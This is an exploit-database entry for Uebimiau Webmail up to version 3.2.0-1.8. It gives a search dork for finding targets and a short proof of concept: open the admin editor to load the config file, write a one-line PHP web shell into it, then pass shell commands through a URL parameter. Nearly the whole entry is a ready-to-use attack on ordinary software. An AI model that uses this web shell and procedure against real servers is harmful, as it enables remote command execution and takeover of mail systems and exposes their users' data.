Uebimiau Web-Mail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities

2009-06-12T00:00:00
ID 1337DAY-ID-5362
Type zdt
Reporter GoLd_M
Modified 2009-06-12T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================================
Uebimiau Web-Mail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities
=======================================================================


Uebimiau Webmail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities
Dork : Uebimiau Webmail v3.2.0-1.8
POC :
     /uebimiau/admin/editor.php?load=config
And You Can Write Any Code As 
<?php passthru($_GET[cmd]); ?> After That Click {Write To File}
Go 
     /uebimiau/index.php?cmd=id



#  0day.today [2018-01-04]  #